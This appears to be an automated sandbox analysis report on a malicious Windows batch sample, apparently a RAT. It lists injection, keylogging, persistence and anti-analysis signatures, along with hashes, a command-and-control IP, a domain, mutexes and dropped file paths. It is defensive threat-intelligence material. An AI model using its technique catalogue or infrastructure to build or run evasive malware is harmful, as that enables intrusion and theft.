Windows Analysis Report
1 (2).cmd

Overview

General Information

Sample name: 1 (2).cmd
Analysis ID: 1524984
MD5: 64d17cf4e56c0fdc93365eb17914ce39
SHA1: 4861be8ba1ba6d567f9950390f290bb8b860ccae
SHA256: 7a83a44720d94be24a8e7745d6871d65afda849c4008ab72511dd5ac38c7378c
Tags: azure-winsecure-comcmduser-JAMESWT_MHT
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

AV Detection
barindex
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.1% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 37_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 37_2_00401000
Source: unknown HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.8:63304 version: TLS 1.2
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B44490D894 FindFirstFileExW, 20_2_000001B44490D894
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B44490DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 20_2_000001B44490DA18
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 40_2_000001C0401CDA18
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401CD894 FindFirstFileExW, 40_2_000001C0401CD894
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401FDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 40_2_000001C0401FDA18
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401FD894 FindFirstFileExW, 40_2_000001C0401FD894
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E99175D894 FindFirstFileExW, 41_2_000002E99175D894
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E99175DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000002E99175DA18
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E99178D894 FindFirstFileExW, 41_2_000002E99178D894
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E99178DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000002E99178DA18
Source: C:\Windows\System32\svchost.exe Code function: 43_2_00000158709DD894 FindFirstFileExW, 43_2_00000158709DD894
Source: C:\Windows\System32\svchost.exe Code function: 43_2_00000158709DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 43_2_00000158709DDA18
Source: C:\Windows\System32\svchost.exe Code function: 45_2_000002A3F066D894 FindFirstFileExW, 45_2_000002A3F066D894
Source: C:\Windows\System32\svchost.exe Code function: 45_2_000002A3F066DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 45_2_000002A3F066DA18

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 154.216.20.132:6969 -> 192.168.2.8:63301
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.8:63301 -> 154.216.20.132:6969
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.201.57.90 195.201.57.90
Source: Joe Sandbox View IP Address: 195.201.57.90 195.201.57.90
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: ipwho.is
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: azure-winsecure.com
Source: global traffic DNS traffic detected: DNS query: ipwho.is
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000002A.00000002.2722818300.00000213BD59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2719554200.00000213BD4EC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000000.2198040001.00000213BD460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000002A.00000002.2710922540.00000213BD400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: powershell.exe, 00000008.00000002.1695203762.00000201CD3A0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoftA
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000002A.00000002.2722818300.00000213BD59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2719554200.00000213BD4EC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000000.2198040001.00000213BD460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000002A.00000002.2710922540.00000213BD400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 0000002A.00000002.2722818300.00000213BD59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2719554200.00000213BD4EC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000000.2198040001.00000213BD460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002A.00000002.2710922540.00000213BD400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: powershell.exe, 00000008.00000002.1940456822.00000201DF0CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E520000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000002A.00000002.2722818300.00000213BD59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2719554200.00000213BD4EC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000000.2198040001.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2710922540.00000213BD400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: powershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2175061332.0000000004E03000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2212213314.000001A38E311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2212213314.000001A38E311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000023.00000002.2175061332.0000000004E19000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2175061332.0000000004E28000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6xGA
Source: powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000026.00000002.2212213314.000001A38F45A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1940456822.00000201DF0CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 63304 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63304
Source: unknown HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.8:63304 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 7720, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Contains functionality to call native functions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B10DF98 NtUnmapViewOfSection, 38_2_00007FFB4B10DF98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B10E0DA NtWriteVirtualMemory, 38_2_00007FFB4B10E0DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B10E102 NtSetContextThread, 38_2_00007FFB4B10E102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B10E122 NtResumeThread, 38_2_00007FFB4B10E122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B110FE4 NtResumeThread, 38_2_00007FFB4B110FE4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B110C5D NtWriteVirtualMemory, 38_2_00007FFB4B110C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B10E078 NtUnmapViewOfSection, 38_2_00007FFB4B10E078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B110F20 NtSetContextThread, 38_2_00007FFB4B110F20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B110A3E NtUnmapViewOfSection, 38_2_00007FFB4B110A3E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B10E112 NtSetContextThread, 38_2_00007FFB4B10E112
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 40_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E991752C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue, 41_2_000002E991752C80
Creates files inside the system directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$rbx-1ktMxXBv
Deletes files inside the Windows folder
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_sbacdivv.ibu.ps1
Detected potential crypto function
Source: C:\Windows\System32\conhost.exe Code function: 20_3_000001B4448A23F0 20_3_000001B4448A23F0
Source: C:\Windows\System32\conhost.exe Code function: 20_3_000001B4448ACC94 20_3_000001B4448ACC94
Source: C:\Windows\System32\conhost.exe Code function: 20_3_000001B4448ACE18 20_3_000001B4448ACE18
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B444902FF0 20_2_000001B444902FF0
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B44490D894 20_2_000001B44490D894
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B44490DA18 20_2_000001B44490DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B10F63E 38_2_00007FFB4B10F63E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B10DD58 38_2_00007FFB4B10DD58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B10640D 38_2_00007FFB4B10640D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B104C4D 38_2_00007FFB4B104C4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B10DC35 38_2_00007FFB4B10DC35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B103AF1 38_2_00007FFB4B103AF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B10E329 38_2_00007FFB4B10E329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B10FDE9 38_2_00007FFB4B10FDE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B10F659 38_2_00007FFB4B10F659
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00007FFB4B38842A 38_2_00007FFB4B38842A
Source: C:\Windows\System32\conhost.exe Code function: 39_3_000001FE3A94CC94 39_3_000001FE3A94CC94
Source: C:\Windows\System32\conhost.exe Code function: 39_3_000001FE3A94CE18 39_3_000001FE3A94CE18
Source: C:\Windows\System32\conhost.exe Code function: 39_3_000001FE3A9423F0 39_3_000001FE3A9423F0
Source: C:\Windows\System32\dllhost.exe Code function: 40_3_000001C03F6E23F0 40_3_000001C03F6E23F0
Source: C:\Windows\System32\dllhost.exe Code function: 40_3_000001C03F6ECC94 40_3_000001C03F6ECC94
Source: C:\Windows\System32\dllhost.exe Code function: 40_3_000001C03F6ECE18 40_3_000001C03F6ECE18
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_0000000140001CF0 40_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_0000000140002D4C 40_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_0000000140003204 40_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_0000000140002434 40_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_0000000140001274 40_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401CDA18 40_2_000001C0401CDA18
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401C2FF0 40_2_000001C0401C2FF0
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401CD894 40_2_000001C0401CD894
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401FDA18 40_2_000001C0401FDA18
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401F2FF0 40_2_000001C0401F2FF0
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_000001C0401FD894 40_2_000001C0401FD894
Source: C:\Windows\System32\winlogon.exe Code function: 41_3_000002E99172CE18 41_3_000002E99172CE18
Source: C:\Windows\System32\winlogon.exe Code function: 41_3_000002E9917223F0 41_3_000002E9917223F0
Source: C:\Windows\System32\winlogon.exe Code function: 41_3_000002E99172CC94 41_3_000002E99172CC94
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E991752FF0 41_2_000002E991752FF0
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E99175D894 41_2_000002E99175D894
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E99175DA18 41_2_000002E99175DA18
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E991782FF0 41_2_000002E991782FF0
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E99178D894 41_2_000002E99178D894
Source: C:\Windows\System32\winlogon.exe Code function: 41_2_000002E99178DA18 41_2_000002E99178DA18
Source: C:\Windows\System32\lsass.exe Code function: 42_3_00000213BDCBCC94 42_3_00000213BDCBCC94
Source: C:\Windows\System32\lsass.exe Code function: 42_3_00000213BDCB23F0 42_3_00000213BDCB23F0
Source: C:\Windows\System32\lsass.exe Code function: 42_3_00000213BDCBCE18 42_3_00000213BDCBCE18
Source: C:\Windows\System32\svchost.exe Code function: 43_3_00000158709A23F0 43_3_00000158709A23F0
Source: C:\Windows\System32\svchost.exe Code function: 43_3_00000158709ACC94 43_3_00000158709ACC94
Source: C:\Windows\System32\svchost.exe Code function: 43_3_00000158709ACE18 43_3_00000158709ACE18
Source: C:\Windows\System32\svchost.exe Code function: 43_2_00000158709D2FF0 43_2_00000158709D2FF0
Source: C:\Windows\System32\svchost.exe Code function: 43_2_00000158709DD894 43_2_00000158709DD894
Source: C:\Windows\System32\svchost.exe Code function: 43_2_00000158709DDA18 43_2_00000158709DDA18
Source: C:\Windows\System32\dwm.exe Code function: 44_3_0000026DB163CE18 44_3_0000026DB163CE18
Source: C:\Windows\System32\dwm.exe Code function: 44_3_0000026DB16323F0 44_3_0000026DB16323F0
Source: C:\Windows\System32\dwm.exe Code function: 44_3_0000026DB163CC94 44_3_0000026DB163CC94
Source: C:\Windows\System32\dwm.exe Code function: 44_3_0000026DB160CE18 44_3_0000026DB160CE18
Source: C:\Windows\System32\dwm.exe Code function: 44_3_0000026DB16023F0 44_3_0000026DB16023F0
Source: C:\Windows\System32\dwm.exe Code function: 44_3_0000026DB160CC94 44_3_0000026DB160CC94
Source: C:\Windows\System32\svchost.exe Code function: 45_3_000002A3EFFCCE18 45_3_000002A3EFFCCE18
Source: C:\Windows\System32\svchost.exe Code function: 45_3_000002A3EFFCCC94 45_3_000002A3EFFCCC94
Source: C:\Windows\System32\svchost.exe Code function: 45_3_000002A3EFFC23F0 45_3_000002A3EFFC23F0
Source: C:\Windows\System32\svchost.exe Code function: 45_2_000002A3F0662FF0 45_2_000002A3F0662FF0
Source: C:\Windows\System32\svchost.exe Code function: 45_2_000002A3F066D894 45_2_000002A3F066D894
Source: C:\Windows\System32\svchost.exe Code function: 45_2_000002A3F066DA18 45_2_000002A3F066DA18
One or more processes crash
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7720 -s 2392
Very long command line found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2679
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682
Source: unknown Process created: Commandline size = 5684
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2679 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682 Jump to behavior
Yara signature match
Source: Process Memory Space: powershell.exe PID: 7720, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.spyw.evad.winCMD@54/91@2/2
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx, 40_2_0000000140002D4C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 37_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 37_2_004011AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 37_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW, 37_2_004017A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\9590544
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7080
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\942558
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7720
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\3288062
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3xmlhmq.zg3.ps1 Jump to behavior
